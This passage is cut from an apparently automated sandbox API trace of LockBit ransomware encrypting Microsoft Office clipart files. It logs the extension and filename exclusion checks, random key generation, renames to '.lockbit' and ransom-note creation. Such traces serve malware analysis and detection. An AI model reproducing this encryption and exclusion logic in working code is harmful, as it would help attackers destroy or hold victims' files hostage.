Office\\CLIPART\\PUB60COR\\") returned="" [0146.683] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned=".WMF" [0146.683] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.684] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.684] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.684] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.lockbit") returned 72 [0146.685] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.686] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.686] malloc (_Size=0x40068) returned 0x3df0008 [0146.686] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33068) returned 1 [0146.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.687] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.688] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.688] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.692] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.693] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.693] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.694] free (_Block=0x1fa2ed8) [0146.694] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.695] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.695] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.695] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x778, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153087.WMF", cAlternateFileName="")) returned 1 [0146.695] lstrcmpiW (lpString1=".", lpString2="J0153087.WMF") returned -1 [0146.695] lstrcmpiW (lpString1="..", lpString2="J0153087.WMF") returned -1 [0146.695] PathFindExtensionW (pszPath="J0153087.WMF") returned=".WMF" [0146.695] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.695] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.695] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.695] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.695] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.695] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.695] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.695] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.695] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.696] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.696] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153087.WMF") returned 1 [0146.697] lstrcmpiW (lpString1="ntldr", lpString2="J0153087.WMF") returned 1 [0146.697] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153087.WMF") returned 1 [0146.697] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153087.WMF") returned -1 [0146.697] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153087.WMF") returned -1 [0146.697] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153087.WMF") returned 1 [0146.697] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153087.WMF") returned -1 [0146.697] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.697] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned=".WMF" [0146.697] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.697] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.697] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.698] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.699] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF.lockbit") returned 72 [0146.699] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153087.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.700] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.700] malloc (_Size=0x40068) returned 0x3df0008 [0146.700] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1912) returned 1 [0146.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.701] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.701] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.701] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.706] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.706] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0146.706] free (_Block=0x1fa2ed8) [0146.706] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.706] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.706] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.706] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153089.WMF", cAlternateFileName="")) returned 1 [0146.707] lstrcmpiW (lpString1=".", lpString2="J0153089.WMF") returned -1 [0146.707] lstrcmpiW (lpString1="..", lpString2="J0153089.WMF") returned -1 [0146.707] PathFindExtensionW (pszPath="J0153089.WMF") returned=".WMF" [0146.707] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.707] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.708] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.708] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153089.WMF") returned 1 [0146.709] lstrcmpiW (lpString1="ntldr", lpString2="J0153089.WMF") returned 1 [0146.709] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153089.WMF") returned 1 [0146.709] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153089.WMF") returned -1 [0146.709] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153089.WMF") returned -1 [0146.709] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153089.WMF") returned 1 [0146.709] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153089.WMF") returned -1 [0146.709] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.709] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned=".WMF" [0146.709] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.709] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.709] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.710] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.710] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF.lockbit") returned 72 [0146.710] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.711] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.711] malloc (_Size=0x40068) returned 0x3df0008 [0146.711] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7848) returned 1 [0146.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.712] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.717] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.717] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0146.719] free (_Block=0x1fa2ed8) [0146.719] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.719] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.719] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.719] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1fc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153091.WMF", cAlternateFileName="")) returned 1 [0146.719] lstrcmpiW (lpString1=".", lpString2="J0153091.WMF") returned -1 [0146.719] lstrcmpiW (lpString1="..", lpString2="J0153091.WMF") returned -1 [0146.719] PathFindExtensionW (pszPath="J0153091.WMF") returned=".WMF" [0146.719] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.719] 